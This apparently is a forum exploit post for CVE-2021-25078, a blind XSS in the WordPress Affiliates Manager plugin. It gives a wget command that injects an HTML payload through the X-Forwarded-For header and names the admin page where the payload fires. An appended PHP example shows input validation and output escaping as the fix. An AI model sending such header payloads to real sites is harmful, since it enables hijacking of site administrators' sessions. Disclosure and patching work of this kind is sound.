
WordPress CVE-2021-25078 Exploit - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting (WordPress Plugin)

  • Thread starter Dark


[CVE-2021-25078] - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting

Product: WordPress Plugin (Affiliates Manager < 2.9.0)

Severity: Medium (6.1)

Explanation: An unauthenticated user can send XSS payloads in HTTP headers (e.g. X-Forwarded-For: <script>alert(123)</script>) when visiting a vulnerable WordPress website. The full HTTP logs appear in the admin panel without sanitization, which causes a blind XSS vulnerability.

Quick Exploit:

As Unauthenticated User:

wget "https://wordpress-site.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O-



The XSS will be executed when the administrator enters:
https://wordpress-site.com/wp-admin/admin.php?page=wpam-clicktracking



Proof of Concept (Affiliates Manager Plugin v2.8.4):



Crafting and sending the exploit:
[Screenshot: r8ddvo7.png]

Creating a normal request to understand which side has been affected:
[Screenshot: 4j8k7ij.png]

Finally, we got it.
[Screenshot: kq0vs0j.jpg]
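For defenders, the explanation above points to two missing controls: the header value is stored without validation and the log view prints it without escaping. The following is an added example, not part of the original post and not the plugin's code; the function names, field names and sample requests are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (input side): reduce a client-supplied X-Forwarded-For
// value to the syntactically valid IP addresses it contains before storing it.
function normalize_forwarded_for(?string $raw): string
{
    $valid = [];
    foreach (explode(',', (string) $raw) as $part) {
        $part = trim($part);
        if ($part !== '' && filter_var($part, FILTER_VALIDATE_IP) !== false) {
            $valid[] = $part;
        }
    }
    return $valid === [] ? 'unknown' : implode(', ', $valid);
}

// Hypothetical helper (output side): build one row of an admin log table,
// HTML-escaping every stored value. In WordPress code, esc_html() plays the
// role that htmlspecialchars() plays here.
function render_log_row(array $entry): string
{
    $cells = '';
    foreach (['time', 'ip', 'referer', 'user_agent'] as $field) {
        $value = (string) ($entry[$field] ?? '');
        $cells .= '<td>' . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}

// Constructed sample requests: one ordinary proxy chain and one carrying the
// header value quoted in the post, plus markup in a second header.
$requests = [
    ['time' => '2022-01-10 12:00:00', 'xff' => '203.0.113.7, 10.0.0.2',
     'referer' => 'https://example.com/', 'user_agent' => 'Mozilla/5.0'],
    ['time' => '2022-01-10 12:00:05', 'xff' => '<img src onerror=alert(/XSS/)>',
     'referer' => '"><b>x</b>', 'user_agent' => 'Wget/1.21'],
];

foreach ($requests as $r) {
    $entry = [
        'time'       => $r['time'],
        'ip'         => normalize_forwarded_for($r['xff']),
        'referer'    => $r['referer'],
        'user_agent' => $r['user_agent'],
    ];
    echo render_log_row($entry), PHP_EOL;
}
```

Validation alone is not enough, because other logged headers such as Referer and User-Agent are free text; escaping at render time is what keeps every stored value inert in the admin page.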

 